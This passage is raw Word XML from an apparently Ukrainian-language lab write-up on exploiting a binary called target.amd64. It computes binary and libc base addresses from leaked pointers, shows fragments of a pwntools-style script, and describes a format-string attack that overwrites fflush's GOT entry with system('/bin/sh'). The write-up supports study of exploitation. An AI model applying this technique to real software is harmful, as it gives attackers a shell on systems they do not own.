          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>amd</w:t>
      </w:r>
      <w:r w:rsidR="00E67B1F" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00E67B1F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A421EE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007323A8" w:rsidRPr="00F54D47">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x5646b60ff1a9</w:t>
      </w:r>
      <w:r w:rsidR="00294C0F" w:rsidRPr="00294C0F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00425015" w:rsidRPr="00752B84">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x5646b60fe000</w:t>
      </w:r>
      <w:r w:rsidR="00294C0F" w:rsidRPr="00294C0F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x11a9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD6DF6" w14:textId="076E7473" w:rsidR="0046767C" w:rsidRDefault="0046767C" w:rsidP="0046767C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655431">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>фсет</w:t>
      </w:r>
      <w:r w:rsidRPr="00655431">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">витіку </w:t>
      </w:r>
      <w:r w:rsidR="004334D2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidR="004334D2" w:rsidRPr="00655431">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004334D2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:r w:rsidR="004334D2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A421EE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A421EE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005C4EA9" w:rsidRPr="00394EB5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x7f4e0e2dad90</w:t>
      </w:r>
      <w:r w:rsidR="00D924F8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00294C0F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00E76F1A" w:rsidRPr="00D86F99">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x7f4e0e2b1000</w:t>
      </w:r>
      <w:r w:rsidR="00865CE3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00294C0F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidR="00933411" w:rsidRPr="00933411">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x29</w:t>
      </w:r>
      <w:r w:rsidR="00933411">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00933411" w:rsidRPr="00933411">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0A5864" w14:textId="77777777" w:rsidR="00620539" w:rsidRPr="00A421EE" w:rsidRDefault="00620539" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA34680" w14:textId="3E4BDA03" w:rsidR="00E33787" w:rsidRDefault="00655431" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Б</w:t>
      </w:r>
      <w:r w:rsidR="00905423">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>азов</w:t>
      </w:r>
      <w:r w:rsidR="00D80B0D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00905423">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес</w:t>
      </w:r>
      <w:r w:rsidR="00BC6F21">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00905423">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00905423" w:rsidRPr="008F644F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00905423" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00905423" w:rsidRPr="008F644F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>amd</w:t>
      </w:r>
      <w:r w:rsidR="00905423" w:rsidRPr="006018DA">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00905423">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A421EE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001E2708" w:rsidRPr="00F54D47">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x5646b60ff1a9</w:t>
      </w:r>
      <w:r w:rsidR="001E2708">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="001E2708" w:rsidRPr="00294C0F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x11a9</w:t>
      </w:r>
      <w:r w:rsidR="001E2708">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="008F644F" w:rsidRPr="00752B84">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x5646b60fe000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A727BB7" w14:textId="54D6A844" w:rsidR="00A8726C" w:rsidRPr="00A2240E" w:rsidRDefault="00A8726C" w:rsidP="00A8726C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Базова адреса </w:t>
      </w:r>
      <w:r w:rsidR="00A2035A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidR="00A2035A" w:rsidRPr="00655431">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A2035A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:r w:rsidR="00A2035A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A421EE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A421EE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FB4BF3" w:rsidRPr="00394EB5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x7f4e0e2dad90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00FB4BF3" w:rsidRPr="00933411">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x29</w:t>
      </w:r>
      <w:r w:rsidR="00FB4BF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00FB4BF3" w:rsidRPr="00933411">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00A2240E" w:rsidRPr="00A2240E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0x7f4e0e2b1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF9960D" w14:textId="77777777" w:rsidR="00BF48D4" w:rsidRPr="00BF48D4" w:rsidRDefault="00BF48D4" w:rsidP="00BF48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lastRenderedPageBreak/>
        <w:t># ANALYSIS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Find base addresses of binary &amp; libc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elf_offset </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF48D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0x11a9  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Offset of main() in binary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bc_offset </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF48D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0x29d90  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Offset of "mov edi, eax" in libc.so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elf.address </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF48D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out.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plit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BF48D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  "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4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6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</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF48D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- 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elf_offset  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44 is offset of binary address in printf() output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bc.address </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF48D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dout.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plit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BF48D4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  "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2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6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</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF48D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- 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bc_offset  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42 is offset of libc address in printf() output</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF48D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g.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uccess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BF48D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le_binary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BF48D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base = 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elf.address)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BF48D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log.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uccess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BF48D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libc.so base = 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BF48D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x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bc.address)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF48D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BF48D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BF48D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43D5D7E5" w14:textId="77777777" w:rsidR="000314A9" w:rsidRPr="00BF48D4" w:rsidRDefault="000314A9" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1674C2B1" w14:textId="03EF24C1" w:rsidR="00444F8F" w:rsidRDefault="00951270" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5F9F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00444F8F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Замінити виклик </w:t>
      </w:r>
      <w:r w:rsidR="00444F8F" w:rsidRPr="00444F8F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">fflush(stdout) </w:t>
      </w:r>
      <w:r w:rsidR="00444F8F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">на виклик </w:t>
      </w:r>
      <w:r w:rsidR="00444F8F" w:rsidRPr="00444F8F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>system("/bin/sh")</w:t>
      </w:r>
      <w:r w:rsidR="00A145C9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B6DC41" w14:textId="2A2C822E" w:rsidR="00BE73B5" w:rsidRDefault="00BE73B5" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="088AED04" wp14:editId="278FC082">
            <wp:extent cx="6645910" cy="560070"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="165392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258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F323" w14:textId="209BCAE2" w:rsidR="00255B1E" w:rsidRPr="00570847" w:rsidRDefault="00740617" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1. </w:t>
      </w:r>
      <w:r w:rsidR="00255B1E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>З</w:t>
      </w:r>
      <w:r w:rsidR="005B6DAD">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">найти адресу </w:t>
      </w:r>
      <w:r w:rsidR="002F6BB6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>запису</w:t>
      </w:r>
      <w:r w:rsidR="002F6BB6" w:rsidRPr="00570847">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F6BB6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ф</w:t>
      </w:r>
      <w:r w:rsidR="00DA5218">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C5051E" w:rsidRPr="00C5051E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>fflush</w:t>
      </w:r>
      <w:r w:rsidR="00C5051E" w:rsidRPr="00570847">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidR="00C5051E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="002F6BB6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F6BB6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GOT</w:t>
      </w:r>
      <w:r w:rsidR="00345F87">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00345F87">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00345F87" w:rsidRPr="00570847">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00345F87">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>got</w:t>
      </w:r>
      <w:r w:rsidR="00345F87" w:rsidRPr="00570847">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00345F87">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:r w:rsidR="00345F87">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00570847">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidR="00570847" w:rsidRPr="00AC6C61">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00570847" w:rsidRPr="00AC6C61">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00570847" w:rsidRPr="00AC6C61">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>amd</w:t>
      </w:r>
      <w:r w:rsidR="00570847" w:rsidRPr="00AC6C61">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="00570847" w:rsidRPr="00570847">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D058AFA" w14:textId="78B154C3" w:rsidR="00FD0D42" w:rsidRDefault="00FD0D42" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="460DA2AB" wp14:editId="02218709">
            <wp:extent cx="6645910" cy="357505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="104013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5572" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId26"/>
                    <a:srcRect t="85102"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="664591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B9F7" w14:textId="5B46132C" w:rsidR="007577C1" w:rsidRDefault="00740617" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2. </w:t>
      </w:r>
      <w:r w:rsidR="00B829BD" w:rsidRPr="00454E63">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Знайти адресу</w:t>
      </w:r>
      <w:r w:rsidR="00454E63">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> глобальної</w:t>
      </w:r>
      <w:r w:rsidR="005605D0" w:rsidRPr="00454E63">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00454E63">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">змінної </w:t>
      </w:r>
      <w:r w:rsidR="005605D0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:r w:rsidR="005605D0" w:rsidRPr="00454E63">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005605D0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="005605D0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BSS</w:t>
      </w:r>
      <w:r w:rsidR="005605D0" w:rsidRPr="00454E63">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (.</w:t>
      </w:r>
      <w:r w:rsidR="005605D0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bss</w:t>
      </w:r>
      <w:r w:rsidR="005605D0" w:rsidRPr="00454E63">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="008B6EDF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="008B6EDF" w:rsidRPr="00AC6C61">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="008B6EDF" w:rsidRPr="00AC6C61">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008B6EDF" w:rsidRPr="00AC6C61">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>amd</w:t>
      </w:r>
      <w:r w:rsidR="008B6EDF" w:rsidRPr="00AC6C61">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="008B6EDF" w:rsidRPr="00570847">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F86FC" w14:textId="592F3F3C" w:rsidR="00F103DF" w:rsidRPr="00D027A9" w:rsidRDefault="005E1251" w:rsidP="00294C0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="410725CF" wp14:editId="419A5803">
            <wp:extent cx="6645910" cy="541020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="177074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8144" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId27"/>
                    <a:srcRect t="44009" b="29055"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="664591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B186" w14:textId="7EA3EC68" w:rsidR="00F103DF" w:rsidRPr="00842C68" w:rsidRDefault="004C6706" w:rsidP="00F103DF">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3. </w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Знайти адресу ф. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF" w:rsidRPr="00830A14">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F103DF" w:rsidRPr="00830A14">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="00F103DF" w:rsidRPr="001F3ED1">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>libc.so</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF" w:rsidRPr="00830A14">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F103DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C26D6" w14:textId="23040BC9" w:rsidR="00F103DF" w:rsidRPr="00D027A9" w:rsidRDefault="00207FA7" w:rsidP="00F103DF">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4. Знайти адресу рядка </w:t>
      </w:r>
      <w:r w:rsidRPr="00D027A9">
        <w:t>"/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D027A9">
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00D027A9">
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidR="00D027A9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="00D027A9" w:rsidRPr="001F3ED1">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>libc.so</w:t>
      </w:r>
      <w:r w:rsidR="00D027A9" w:rsidRPr="00830A14">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D027A9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1007FE" w14:textId="1AE59476" w:rsidR="00D027A9" w:rsidRPr="006E4886" w:rsidRDefault="004F79B5" w:rsidP="00F103DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">4.5. </w:t>
      </w:r>
      <w:r w:rsidR="00E668A8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Визначити офсет</w:t>
      </w:r>
      <w:r w:rsidR="00A16E99">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A575C9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">рядка </w:t>
      </w:r>
      <w:r w:rsidR="00A575C9" w:rsidRPr="00A575C9">
        <w:t>"%</w:t>
      </w:r>
      <w:r w:rsidR="00A575C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00A575C9" w:rsidRPr="00A575C9">
        <w:t xml:space="preserve"> %</w:t>
      </w:r>
      <w:r w:rsidR="00A575C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00A575C9" w:rsidRPr="00A575C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A575C9">
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidR="00A575C9" w:rsidRPr="00A575C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A575C9" w:rsidRPr="006E4886">
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="00A575C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00A575C9" w:rsidRPr="006E4886">
        <w:t xml:space="preserve"> %</w:t>
      </w:r>
      <w:r w:rsidR="00A575C9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
